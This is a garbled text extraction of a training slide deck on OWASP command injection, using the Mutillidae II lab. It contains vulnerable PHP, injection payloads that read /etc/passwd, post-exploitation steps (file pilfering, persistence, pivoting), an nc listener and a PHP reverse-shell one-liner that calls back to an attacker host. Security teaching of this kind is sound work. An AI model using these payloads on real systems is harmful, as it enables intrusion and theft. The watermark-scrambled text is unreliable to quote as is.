Web Application Security

Report 14 Downloads 120 Views

Web Application. Security. OWASP A1 ... Web Application Security. OWASP A1-‐Injection ...... [10] Mu:llidae: Using Command Injec:on to Gain Remote Desktop.

Web  Application   Security   ll A -

R

ts h g i

OWASP  A1  -­‐  Command   oIrnjection   f d D T SC

re P -

re a p

Jeremy  Druin   LC L IS Cer,fied  Lead  Informa,on  dSE ecurity   Analyst   n aWAPT-­‐GOLD,   GXPN,  GPEN,  GWAPT,   G GMOB,  GSEC,  Sec+   n ui r D y   m e r Je   t gh i r   opy C ) c (   ©  Copyright  Jeremy  Druin  -­‐  All  Rights  Reserved    

R

ed v r e es

C

ui r D

yecurity   Web  Applica,on   S m e er J t h OWASP  A1-­‐Injec,on   g yri op C (c)

INTRODUCTION  TO  INJECTION  

R

R

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

nd a n

L L EIS

re P -

re a p

or f d

D T SC

ll A -

ts h g i

ed v r e es

2  

Injec&on   • 

•       

ll A -

R

ts h g i

R

ed v r e es

D T Injec,on  may  be  possible  when  input  (data)  is  incorporated   SC with  code/ r fo script  fragments  passed  to  an  interpreter   d re a p •  Any  dynamically  generated  code/script  passed  tPo  reinterpreters   at  run,me  may  be   vulnerable   LC L ISXpath,  NoSQL   •  SQL,  CGI,  XML,  JavaScript,  SMTP,  LDAP,   E nd a in u r An  interpreter  cannot  dis,nguish   the  code  from  the  data  incorporated  at   D y m e run,me   r Je t gh i r py o C ) c (

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Web  Application  Security   OWASP  A1-­‐Injection  

3  

Injec&on  

ll A -

R

ts h g i

R

D T C •  While  the  developer  intends  input  to  be  treated  as  data,  Sinterpreters   use   r fo context  to  decide  what  to  execute   d re a p e r •  Example   P LC   L IS E  Code:      ping     nd a in u r  Input  Data:    www.google.com   D y em www.google.com    Developer  sees:  Jepring   t h g  Interpreter   yrsi ees:  ping  www.google.com   p o C   (c)    

•  Developer  "knows"  code  is  blue  /  data  is  red    

ed v r e es

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Web  Application  Security   OWASP  A1-­‐Injection  

4  

Injec&on   •  •   

ll A -

R

ts h g i

R

D T C While  the  developer  intends  input  to  be  treated  as  data,  Sinterpreters   use   r fo context  to  decide  what  to  execute   d re a p e r Example   P LC L IS E  Code:      ping     nd a in u r  Input  Data  :    www.google.com;   cat  /etc/passwd   D y em www.google.com;  cat  /etc/passwd    Developer  sees:  Jepring   t h g  Interpreter   yrsi ees:  ping  www.google.com;  cat  /etc/passwd   p o C (c)

  •  Interpreter  "knows"  ping  and  cat  are  commands    

ed v r e es

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Web  Application  Security   OWASP  A1-­‐Injection  

5  

ts h g i

R

ed v r e es

Injec&on   ll R A D   CT S r assumes  this  will   ond   f •  The  develop  intends  for  data  to  enter  the  applica,on   a d e r always  be  the  case   pa e r P •  An  interpreter  cannot  dis,nguish  the  code   i ntended   by  the  developer  from   C L L the  data  incorporated  at  run,me   EIS nd a •  Both  code  and  data  are  ASCII  text   uin r y Dcontext  to  decide  and  “first  match  wins”   •  Interpreters  a`empt  to  umse   re e •  From  the  interpreters   t J point  of  view  the  developers  inten,ons  are  ambiguous   h rig y   op C c) (  

 

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Web  Application  Security   OWASP  A1-­‐Injection  

6  

C

R

ui r D

yecurity   Web  Applica,on   S m e er J t h OWASP  A1-­‐Injec,on   g yri op C (c)

INTRODUCTION  TO  COMMAND  INJECTION  

R

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

nd a n

L L EIS

re P -

re a p

or f d

D T SC

ll A -

ts h g i

ed v r e es

7  

Command  Injec&on   ll A -

R

ts h g i

R

ed v r e es

  D T SC that  passes   •  Injec,ng  snippets  of  shell  script/CGI  script  into  an  applica,on   r fo d the  opera,ng  system  commands  to  the  host   re a p e r P supplied  input  into  the   •  May  occur  when  applica,on  incorporates  user   C LL host   opera,ng  system  command  passed  to  Sthe   EI d •  A`ack  takes  advantage  of  the  trust   nthe  host  (opera,ng  system)  has  in  the   a applica,on   uin r D y •  The  trust  boundary  violated   m is  between  the  web  applica,on  and  the  opera,ng   e r Je system   t gh i r •  The  a`ack  eoxecutes   on  the  host  opera,ng  system  under  the  applica&ons   py C ) account   c (

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Web  Application  Security   OWASP  A1:  Command  Injection  

8  

C

ui r D

yecurity   Web  Applica,on   S m e er J t h OWASP  A1-­‐Injec,on   g yri op C (c)

COMMAND  INJECTION  BY  EXAMPLE  

R

R

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

nd a n

L L EIS

re P -

re a p

or f d

D T SC

ll A -

ts h g i

ed v r e es

9  

Command  Injec&on   ll R A   D CT •  The  DNS  Lookup  page  in  Mu,llidae  II  passes  the  IP  address/host   name   S r submi`ed  by  the  user  to  the  nslookup  command   red fo

ts h g i

a

p e r -P

h>p://mu&llidae/index.php?page=dns-­‐lookup.php   LC  

nd a n

op C (c)

t h g yri

J

m e r e

y

ui r D

L S I E

R

ed v r e es

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Web  Application  Security   OWASP  A1:  Command  Injection  

10  

Command   Injec&on     •  Note:  Mu,llidae   contains  tutorials   that  may  be   helpful  

nd a n

  op C (c)

t h g yri

J

m e r e

y

ui r D

L L EIS

C

re P -

re a p

or f d

D T SC

ll A -

R

ts h g i

R

ed v r e es

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Web  Application  Security   OWASP  A1:  Command  Injection  

11  

Command  Injec&on       Vulnerable  server-­‐ side    source  code  

Field  target_host  

nd a n

L L EIS

C

re P -

re a p

or f d

D T SC

ll A -

R

ts h g i

ui r D $lTargetHost = $_REQUEST["target_host"]; y m e r echo '
' Je t gh .shell_exec("nslookup " . $lTargetHost) i r y op .'
'; C (c)

R

ed v r e es

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Web  Application  Security   OWASP  A1:  Command  Injection  

12  

Command  Injec&on     •  When  user  submits  a  value,  the  server   incorporates  the  value  into  an  opera,ng   system  command   re $lTargetHost = P $_REQUEST["target_host"]; C L echo '
' d n .shell_exec("nslookup " in .a $lTargetHost) ru D y .'
'; em r

e tJ

gh i
   r py o  nslookup   C www.google.com   ) c 
  (

re a p

or f d

D T SC

ll A -

R

ts h g i

R

ed v r e es

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Web  Application  Security   OWASP  A1:  Command  Injection  

13  

Command  Injec&on     •  The  O/S  will  execute  the  ini,al   command  then  injected   commands
  

nd a  nslookup  www.google.com;   uinls   r D y
  m e r Je t gh i r py o C ) c (

L L EIS

C

re P -

re a p

or f d

D T SC

ll A -

R

ts h g i

R

ed v r e es

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Web  Application  Security   OWASP  A1:  Command  Injection  

14  

Command  Injec&on     •  Commands  can  be  chained
    nslookup  www.google.com;   LC L IS cd  /;  ls   E nd a 
  uin r D y m e r Je t gh i r py o C ) c (

re P -

re a p

or f d

D T SC

ll A -

R

ts h g i

R

ed v r e es

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Web  Application  Security   OWASP  A1:  Command  Injection  

15  

Command  Injec&on     •  Commands  can  be  run  to  explore  system,   escalate  privilege  and  open  resources   re P -

$lTargetHost = $_REQUEST["target_host"]; LC L echo '
' nd E a .shell_exec("nslookup u"in . r D $lTargetHost) y m e .'
'; er

t h g yri

J

   op C ) ww.google.com  &&  cat  /etc/passwd   nslookup   (cw 
 

re a p

or f d

D T SC

ll A -

R

ts h g i

R

ed v r e es

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Web  Application  Security   OWASP  A1:  Command  Injection  

16  

Command  Injec&on  

re Command   a p Injec,on   Pre nd a n

op C (c)

t h g yri

J

m e r e

y

ui r D

L S I E

C L

or f d

D T SC

ll A -

R

ts h g i

R

ed v r e es

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Web  Application  Security   OWASP  A1:  Command  Injection  

17  

C

ui r D

yecurity   Web  Applica,on   S m e er J t h OWASP  A1-­‐Injec,on   g yri op C (c)

LOCATING  COMMAND  INJECTION  

R

R

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

nd a n

L L EIS

re P -

re a p

or f d

D T SC

ll A -

ts h g i

ed v r e es

18  

Loca&ng  Command  Injec&on   •  Look  for  pages  that  appear   to  execute  system   commands   •  ping,  nslookup,  traceroute,   nd etc.   a uin r D y •  CGI  scripts   m e r Je t gh i r py o C ) c (

L L EIS

C

re P -

re a p

or f d

D T SC

ll A -

R

ts h g i

R

ed v r e es

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Web  Application  Security   OWASP  A1:  Command  Injection  

19  

Loca&ng  Command  Injec&on   •  A>empt  to  iden&fy  the  opera&ng  system   •  HTTP  Response  vanity  headers   C •  x-­‐powered-­‐by,  Server,  x-­‐aspnet-­‐version,  etc.   LL

IS E •  May  be  able  to  infer  opera&ng  system   nd a from  clues   uin r D y m exclusively   e •  ASP.NET  runs  on  Windows   r Je t h •  IIS  version  is  yr,ig ed  directly  to  opera,ng   op system  C version   (c)

re P -

re a p

or f d

D T SC

ll A -

R

ts h g i

R

ed v r e es

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Web  Application  Security   OWASP  A1:  Command  Injection  

20  

Loca&ng  Command  Injec&on   •  A>empt  to  iden&fy  the  opera&ng  system  

re a p •  May  be  able  to  infer  opera&ng  system  from  clues   e r P •  ASP.NET  runs  on  Windows  exclusively   LLC IS E •  IIS  version  is  ,ed  directly  to  opera,ng   nd system  version   a in u r •  A>empt  to  cause  any  error   Don  any  page   y m e r •  Error  message  may   Jereveal  opera,ng  system   t gh i r py o C ) c (

or f d

D T SC

ll A -

R

ts h g i

R

ed v r e es

File  paths  imply  Linux   opera&ng  system  

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Web  Application  Security   OWASP  A1:  Command  Injection  

21  

Loca&ng  Command  Injec&on   •  A>empt  to  fuzz  input  fields  to  cause  error  message   for d e r a

D T SC

ll A -

R

ts h g i

•  Characters  reserved  in  opera,ng  system  shell   rep P •  /bin/bash:  !  #  $  %  &  '  (  )  *  +  ,  -­‐  .  /  :  ;L    |  '  `  ,  ;n  =d  (  )  !  ”  [  ]  .  *  ?     a n i u •  Non-­‐alphanumeric  ASCII  cyharacters   Dr m e r •  Command  injec,on   Jvealues  from  Fuzz  DB   t gh i r py •  Note  shell  func,ons   may  not  display  standard  error   o C (c) •  When  assessing  “blind”  pages  errors  may  be  inferred  by  missing  output  

R

ed v r e es

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Web  Application  Security   OWASP  A1:  Command  Injection  

22  

Loca&ng  Command  Injec&on   •  Blind  Command  Injec&on  

D T SC

ll A -

R

ts h g i

R

ed v r e es

or f d e r •  Some  vulnerable  pages  may  not  produce  explicit  output   pa e r P •  Two  methods  may  help  detect  command  injec,on   vulnerabili,es  in  these  cases   C L L S I E •  Missing  output   d an n •  Time-­‐delay  inference   ui r D y m e r Je t gh i r py o C ) c (

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Web  Application  Security   OWASP  A1:  Command  Injection  

23  

Web  Application  Security   OWASP  A1:  Command  Injection   Loca&ng  Command  Injec&on   D

ll A -

R

ts h g i

R

ed v r e es

or f dinjec,on  may  interupt   •  In  some  cases  an  error  caused  by  fuzzing  for  command   e r pa e the  normal  flow  of  execu,on   r P •  The  site  may  suppress  error  messages  resul,ng   LC in  neither  normal  output  nor  error   L IS output   E nd a •  The  site  may  only  display  informa,on   from  standard  output  (stdout)  but  not  from  the   uin r standard  error  file  handle   (D stderr)   y m e r e ay  halt  execu,on  of  the  shell  command  before  the  command   •  The  injected  value  Jm t h can  generate  ro gutput   i py o C •  Use  differen,al   analysys  to  detect  differences  between  a  baseline  response  and   ) c ( other  responses  

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

•  When  fuzzing  for  command  injec&on  note  when  pages  aSre   CTmissing  output  

24  

Loca&ng  Command  Injec&on   ll A -

R

ts h g i

D T •  By  causing  the  response  &me  of  the  increase  measurably   SCit  may  be   r fo d possible  to  detect  command  injec&on  without  visible   re output   a p e r P ,me  of  a  normal  response   •  Use  ,me-­‐delay  inference  comparing  the  average   C against  an  a`acker  chosen  ,me  delay   S LL EI d n •  If  the  site  is  delayed  as  expected   caommand   injec,on  has  likely  taken  place   n i ru D y •  Example   m e er J takes  two  second  to  load  and  an  a`acker  injec,ons  a   •  If  a  page  typically   t h g yrtiakes  15  seconds  to  execute,  a  response  ,me  of  17  seconds   p command  that   o C implies  (ac  )vulnerability  

R

ed v r e es

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Web  Application  Security   OWASP  A1:  Command  Injection  

25  

Loca&ng  Command  Injec&on   ll A -

R

ts h g i

R

D T •  Time-­‐delay  inference  should  be  a>empted  with  commands   SC most  users   r fo d are  allowed  to  execute  that  cause  a  predictable  delay   re a p e r P increments  and  being   •  ping  may  work  well  due  to  running  in  one  second   LaCgainst  the  loopback  interface   L executable  by  users  on  Windows  and  Linux   IS E •  Windows:  ping  -­‐n  15  127.0.0.1  n and ui r D •  Linux:  ping  -­‐i  15  -­‐c  2m  1y27.0.0.1   re e tJ •  Try  prefixing  and  gshuffixing   the  injec,on  with  chaining  characters  discussed  in   i r upcoming  slides   py o C ) c •  ||,  |(,  &&,  &,  `,  ,    

ed v r e es

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Web  Application  Security   OWASP  A1:  Command  Injection  

26  

C

ui r D

yecurity   Web  Applica,on   S m e er J t h OWASP  A1-­‐Injec,on   g yri op C (c)

TESTING  COMMAND  INJECTION  

R

R

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

nd a n

L L EIS

re P -

re a p

or f d

D T SC

ll A -

ts h g i

ed v r e es

27  

Web  Application  Security   OWASP  A1:  Command  Injection   Tes&ng  Command  Injec&on   D T SC

ll A -

R

ts h g i

R

ed v r e es

d e r •  The  source  code  prior  to  the  injec,on  point  cannot   pbae  controlled   e r P C •  The  injec,on  must  work  with  the  exis,ng  LcLommand   Injec&on  occurs   S I E requires  chaining   here  so  a>acker   •  Successful  command  injec,on  typically   d n a influence  begins  at   n i u r   this  point   D y m e $lTargetHost = $_REQUEST["target_host"]; r Je t echo '
' gh i r py o .shell_exec("nslookup " . $lTargetHost) C ) (c .'
';

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

•  Once  vulnerability  located  (or  at  least  suspected)  test  focrommands  

28  

Tes&ng  Command  Injec&on   ll A -

R

ts h g i

R

ed v r e es

D T •  Command  chaining  allows  one  command  to  be  executed   once  the  previous   SC r o f d completes   e ar p re P   C L L IS Windows   E nd a   uin r D y command1command2 m  Runs  the  first  command  then  the  second  command   e r Je t command1  &  command2  Runs  the  first  command  then  the  second  command   gh i r y pommand2 o command1  &&   c  Run  second  command  only  if  first  command  successful   C ) (c

command1  ||  command2

 Run  second  command  only  if  first  command  fails  

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Web  Application  Security   OWASP  A1:  Command  Injection  

29  

Tes&ng  Command  Injec&on  

ts h g i

R

ed v r e es

ll R A D T previous  completes   •  Command  chaining  allows  one  command  to  be  executed  once   tChe   S or f d e   r pa e r P Linux   LC L   IS E ntdhe  first  command  then  the  second  command   command1command2  Runs   a uin r command1;  command2   D  Runs  the  first  command  then  the  second  command   y m command1  &  command2  Jere  Runs  the  first  command  then  the  second  command   t gh i r command1  &&  command2  Run  second  command  only  if  first  command  successful   y p o C command1  |(c|  )command2  Run  second  command  only  if  first  command  fails  

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Web  Application  Security   OWASP  A1:  Command  Injection  

30  

Tes&ng  Command  Injec&on   ll A -

R

ts h g i

D T •  Start  by  injec&ng  basic  commands  that  are  most  likely  rto   SCwork  at  any   fo d privilege  level   re a p e r P •  Linux   LC L •  ls  list  directory  contents   IS E nd a •  pwd  print  current  directory   path   uin r D y •  Windows   m e r Je t •  dir  list  driirectory   contents   gh py o •  cd ) C  print  current  directory  path   (c

R

ed v r e es

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Web  Application  Security   OWASP  A1:  Command  Injection  

31  

Tes&ng  Command  Injec&on     •  Start  by  injec&ng  basic   commands  that  are  most  likely   to  work  at  any  privilege  level   •  Directory  lis,ng  usually  possible   LC L IS E •  Prin,ng  the  current  directory;   nd a PWD  (Linux),  CD  (Windows)  also   uin r D generally  ubiquitous   y m e r Je t gh i r py o C ) c (

re P -

re a p

or f d

D T SC

ll A -

R

ts h g i

R

ed v r e es

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Web  Application  Security   OWASP  A1:  Command  Injection  

32  

Tes&ng  Command  Injec&on   D T •  A>empt  to  chain  commands  based  on  opera&ng  system   SC r fo d re a p e r P LC L IS E nd a uin r D y m e r Je t gh i r py o C ) c (

ll A -

R

ts h g i

R

ed v r e es

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Web  Application  Security   OWASP  A1:  Command  Injection  

33  

C

ui r D

yecurity   Web  Applica,on   S m e er J t h OWASP  A1-­‐Injec,on   g yri op C (c)

USING  COMMAND  INJECTION  

R

R

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

nd a n

L L EIS

re P -

re a p

or f d

D T SC

ll A -

ts h g i

ed v r e es

34  

Command  Injec&on   ll A -

R

ts h g i

D T •  Once  command  injec&on  established  work  towards  control   SC of  system   r fo d re •  Determine  account  and  privilege  level  of  current  user   a p e r P •  Determine  current  loca,on  within  file  system   LC L EIS •  Catalog,  locate  and  pilfer  available  fidles   an n uiand  try  to  establish  shell   r •  Test  for  outbound  connec,vity   D y m e r •  A`empt  to  persist  aJccess   e t gh i r •  Pivot  into  internal   py network   o C ) c (

R

ed v r e es

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Web  Application  Security   OWASP  A1:  Command  Injection  

35  

Command  Injec&on  Example     •  Determine  account  and  privilege  level  of  current   or f d e user   r pa e r   -P www.google.com;whoami;pwd;ls   nd a n

  whoami

(c)

L L EIS

ui r D account    print  current  uyser   m e r Je t gh i r py o C

C

D T SC

ll A -

R

ts h g i

R

ed v r e es

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Web  Application  Security   OWASP  A1:  Command  Injection  

36  

Command  Injec&on  Example     •  Determine  current  loca&on  within  file  system   or f d e r   a rep www.google.com;whoami;pwd;ls  

  pwd   ls  

L L EIS

P C

nd a  print  current  directory   uin r  list  contents  m of  ycDurrent  directory   re e tJ h rig y op C (c)

D T SC

ll A -

R

ts h g i

R

ed v r e es

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Web  Application  Security   OWASP  A1:  Command  Injection  

37  

Command  Injec&on  Example     •  Catalog,  locate  and  pilfer  available  files     www.google.com;  cat  /etc/passwd  

 

nd a n

op C (c)

t h g yri

J

m e r e

y

ui r D

L L EIS

C

re P -

re a p

or f d

D T SC

ll A -

R

ts h g i

R

ed v r e es

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Web  Application  Security   OWASP  A1:  Command  Injection  

38  

C

ui r D

yecurity   Web  Applica,on   S m e er J t h OWASP  A1-­‐Injec,on   g yri op C (c)

COMMAND  INJECTION  DEFENSE  

R

R

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

nd a n

L L EIS

re P -

re a p

or f d

D T SC

ll A -

ts h g i

ed v r e es

39  

Command  Injec&on  Defense     •  Default  Deny   •  Least  Privilege   •  Data  Execu&on  Preven&on   nd a n

op C (c)

t h g yri

J

m e r e

y

ui r D

L L EIS

C

re P -

re a p

or f d

D T SC

ll A -

R

ts h g i

R

ed v r e es

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Web  Application  Security   OWASP  A1:  Command  Injection  

40  

Command  Injec&on  Defense    

D T SC

•  Default  Deny  

ll A -

R

ts h g i

R

ed v r e es

or f Someone   please  explain  why  this   d e •  By  default  the  web  applica,on  account  must  not   ar apache  server  account  is  allowed   p e r be  allowed  to  run  any  shell  commands   to  ping.  Do  web  servers  need  to   P check  to  see  if  their  cousin  IIS  is   LC L online?   EIS nd a n

op C (c)

t h g yri

J

m e r e

y

ui r D

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Web  Application  Security   OWASP  A1:  Command  Injection  

41  

Command  Injec&on  Defense     •  Default  Deny    

re a p

or f d

D T SC

ll A -

R

ts h g i

re P •  If  opera,ng  system  func,onality  is  necessary   a-`empt  to  call  a  standard   C L L framework  func,on  that  will  supply  the   ISsame  result   E nd to  resolve  a  hostname  use  standard   •  For  example  if  a  PHP  applica,on   n eeds   a in u r func,on  gethostbyaddr()  rather   D than  execu,ng  nslookup  via  shell_exec()   y m e r Je t gh i r py o C ) c (

R

ed v r e es

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Web  Application  Security   OWASP  A1:  Command  Injection  

42  

Command  Injec&on  Defense     •  Least  Privilege  

D T SC

ll A -

R

ts h g i

or f d execute  specific,   e •  The  least-­‐privilege  principle  states  applica,ons  must   o nly   r pa e r preapproved  commands   P LC execu,ng  under  the  web   •  Default  deny  will  prevent  any  commands  Lfrom   IS E applica,on  account   nd a •  Least-­‐privilege  effec,vely  is  arn   uienxcep,on  to  default  deny  for  the  necessary   commands  (executable)  my D re e tJ h rig y op C (c)

R

ed v r e es

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Web  Application  Security   OWASP  A1:  Command  Injection  

43  

Command  Injec&on  Defense     •  Data  Execu&on  Preven&on  

D T SC

ll A -

R

ts h g i

R

ed v r e es

or f •  All  non-­‐alpha-­‐numeric  parameter  values  passed  to  tahe   redshell  script  must  be   p e r escaped   P LC of  "nn",  where  "nn"  is  a  string  of   •  Bash:  \0xx  translates  to  the  octal  ASCII  equivalent   L IS digit   E nd a   uin r D y •  Input  could  be  shell-­‐script   o r  data,  but  the  interpreter  (i.e.  Bash)  "knows"   m e r data     ere   escaped  characters   a J t h g ri when  the  input  forms  syntac,cally  correct  shell-­‐script   •  This  is  true  peyven   o C (c)

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Web  Application  Security   OWASP  A1:  Command  Injection  

44  

ru Web  Applica,on  Security   D y m e OWASP  A1-­‐Injec,on   r Je

C

R

R

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

i

nd a n

L L EIS

re P -

re a p

or f d

D T SC

ll A -

ts h g i

ed v r e es

t

gh Command  Injec,on   i r py o C ) c (

LAB  

45  

Command  Injec&on     •  Extract  /etc/password  

nd a n

op C (c)

t h g yri

J

m e r e

y

ui r D

L L EIS

C

re P -

re a p

or f d

D T SC

ll A -

R

ts h g i

R

ed v r e es

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Lab  

46  

ts Command  Injec&on  to  extract  / h g i R l etc/password   Al D T   SC r fo •  The  DNS  lookup  page  in   d re a p e Mu&llidae  II  contains  a   r P command  injec&on  vulnerability   LC L IS E •  Ubuntu   nd a •  h`p://localhost/mu,llidae/ ruin D y index.php?page=dns-­‐lookup.php   m e r Je •  Samurai  WTF   t gh i r py •  h`p://mu,llidae/index.php? o C ) c page=dns-­‐lookup.php   (

R

ed v r e es

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Lab  

47  

ts Command  Injec&on  to  extract  /etc/ h g i R l password   Al D T   SC r fo •  Locate  the  command  injec,on   d re a p e vulnerability  using  command  separators   r P and  universal  binaries   LC

•  •  •  • 

&  ls   |  ls   ;  ls   Others   op C (c)

nd a n

t h g yri

J

m e r e

y

ui r D

L S I E

R

ed v r e es

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Lab  

48  

Command  Injec&on  to  extract  /etc/ password     •  Determine  the  current  directory   •  &  pwd   nd a n

op C (c)

t h g yri

J

m e r e

y

ui r D

L L EIS

C

re P -

re a p

or f d

D T SC

ll A -

R

ts h g i

R

ed v r e es

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Lab  

49  

ts Command  Injec&on  to  extract  /etc/ h g i R l password   Al D T   SC r fo •  Use  directory  traversal  to  move  out  of   d re a p e the  web  root  directory  and  access  / r P C etc/passwd   LL

•  &  cat  /etc/passwd    

op C (c)

t h g yri

J

m e r e

y

uin r D

IS E d an

R

ed v r e es

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Lab  

50  

ru Web  Applica,on  Security   D y m e OWASP  A1-­‐Injec,on   r Je

C

R

R

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

i

nd a n

L L EIS

re P -

re a p

or f d

D T SC

ll A -

ts h g i

ed v r e es

t

gh Command  Injec,on   i r py o C ) c (

LAB  

51  

Command  Injec&on     •  Reverse  bash  shell  

D T SC

or f d •  Reference:  demo-­‐command-­‐injec,on-­‐reverse-­‐shell-­‐via-­‐php.txt   e r pa e r P LC L IS E nd a uin r D y m e r Je t gh i r py o C ) c (

ll A -

R

ts h g i

R

ed v r e es

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Lab  

52  

ts Command  injec&on  to  gain   h g i R l reverse  bash  shell   Al D T   SC r fo •  The  DNS  lookup  page  in   d re a p e Mu&llidae  II  contains  a   r P command  injec&on  vulnerability   LC L IS E •  Ubuntu   nd a •  h`p://localhost/mu,llidae/ ruin D y index.php?page=dns-­‐lookup.php   m e r Je •  Samurai  WTF   t gh i r py •  h`p://mu,llidae/index.php? o C ) c page=dns-­‐lookup.php   (

R

ed v r e es

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Lab  

53  

ts Command  injec&on  to  gain  reverse  bash   h g i R l shell   Al D T   SC r fo •  Locate  the  command  injec&on   d re a p e vulnerability  using  command   r P C separators  and  universal  binaries   LL

•  •  •  • 

&  ls   |  ls   ;  ls   Others  

op C (c)

t h g yri

J

m e r e

y

uin r D

IS E d an

R

ed v r e es

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Lab  

54  

Command  injec&on  to  gain  reverse  bash  shell    

ll A -

R

ts h g i

R

ed v r e es

D T SC •  Send  commands  tes&ng  outbound  connec&vity  from  voulnerable   server   r f d e back  to  a>acker  controlled  host   r pa e r •  Set  up  listener  on  a`acker  controlled  host   - P C L L •  A`empt  to  have  web  applica,on  server   ISreach  out  to  a`acker  host  over  various   E protocols  and  ports   nd a n •  ICMP  à  ping  -­‐c  1  10.0.0.164  rui D y •  UDP  à    tracepath  -­‐c  re 1  m 10.0.0.164   e tJ •  TCP  à    telnet   1 0.0.0.164   1234   h g i r ppyrotocols  likely  to  be  allowed   o •  Test  ports  a) nd   C c ( •  DNS,  web,  proxy,  etc.  

 

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Lab  

55  

R

ts Command  injec&on  to  gain  reverse  bash  shell   h g i R l Al   D T •  Set  up  tcpdump  on  local  host  filtering  for  incoming  packets   SC des&ned  for   r fo d a>acker  IP   re a

•  tcpdump  -­‐i  eth0  -­‐vv  -­‐X  dst    

 

nd a n

op C (c)

t h g yri

J

m e r e

y

ui r D

L L EIS

C

p e r -P

ed v r e es

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Lab  

56  

Command  injec&on  to  gain  reverse  bash  shell     •  A`empt  to  have  web  applica,on  send  packet  

D T SC

ll A -

R

ts h g i

R

ed v r e es

or f d •  www.google.com;  tracepath  -­‐c  1  10.224.35.168  (UDP)   e r pa e r •  www.google.com  &  telnet  10.224.35.168  1234   P(TCP)   LC L IS E nd   a A>acking  host  receives  packet   uin r D confirming  connec&vity   y m re e tJ h rig y op C (c)

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Lab  

57  

R

ed v r e es

ts Command  injec&on  to  gain  reverse  bash  shell   h g i R l Al   D T C server  connect   •  If  outbound  connec&vity  established  a>empt  to  have  w eb   S r fo d back  to  a>acker  host   re

•  Set  up  listener  on  a`acker  host   nc  -­‐l  -­‐p  1234  

nd a n

op C (c)

t h g yri

J

m e r e

y

ui r D

a

L L EIS

C

p e r -P

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Lab  

58  

R

ed v r e es

ts Command  injec&on  to  gain  reverse  bash  shell   h g i R l Al   D T C server  connect  back  to   •  If  outbound  connec&vity  established  a>empt  to  have  w eb   S r fo d a>acker  host   re

pa e r •  Once  listener  set-­‐up,  ask  web  applica,on  server   Pto  connect  back  to  a`acker  host   LC •  Set  IP  address  appropriately   L IS E nd www.google.com;php  -­‐r  '$sock=fsockopen(”",);exec("/bin/sh   -­‐i  &3  2>&3");'   a n i ru D   y m e er J t h g yri p o C (c)

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Lab  

59  

Command  injec&on  to  gain   reverse  bash  shell     •  Once  web  applica&on   server  establishes   connec&on,  a  shell  should   be  opened  

nd a •  Note  a  shell  is  not  a  terminal   uin r D •  The  shell  runs  with  the  emy er J privileges  of  the  web   t h g applica,on  account   yri p o C (c)

D T SC

ll A -

R

Type   or commands   f d into  shell   e r a

L L EIS

C

p e r -P

ts h g i

R

ed v r e es

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Lab  

60  

ru Web  Applica,on  Security   D y m e OWASP  A1-­‐Injec,on   r Je

C

R

R

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

i

